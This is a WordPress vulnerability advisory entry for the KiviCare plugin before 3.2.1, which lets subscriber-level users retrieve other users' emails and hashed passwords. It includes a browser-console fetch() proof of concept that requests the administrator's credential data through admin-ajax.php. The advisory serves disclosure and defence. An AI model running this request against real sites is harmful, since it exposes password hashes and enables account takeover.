Lucene search

K
wpvulndbWpvulndbWPVDB-ID:85CC39B1-416F-4D23-84C1-FDCBFFB0DDA0
HistoryJun 05, 2023 - 12:00 a.m.

KiviCare Management System < 3.2.1 - Subscriber+ Sensitive Information Disclosure

2023-06-0500:00:00
wpscan.com
17
kivicare
management
system
subscriber
sensitive information
disclosure
plugin
access
user
email
hashed password

EPSS

0.001

Percentile

28.2%

The plugin does not restrict the information returned in a response and returns all user data, allowing low privilege users such as subscriber to retrieve sensitive information such as the user email and hashed password of other users

PoC

Run the below command in the developer console of the web browser while being on the blog as susbscriber user. This will return all user data, including the hashed password and email address of the user with ID 1 (usually the administrator) fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=ajax_post&route;_name=resend_credential&id;=1’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));

EPSS

0.001

Percentile

28.2%

Related for WPVDB-ID:85CC39B1-416F-4D23-84C1-FDCBFFB0DDA0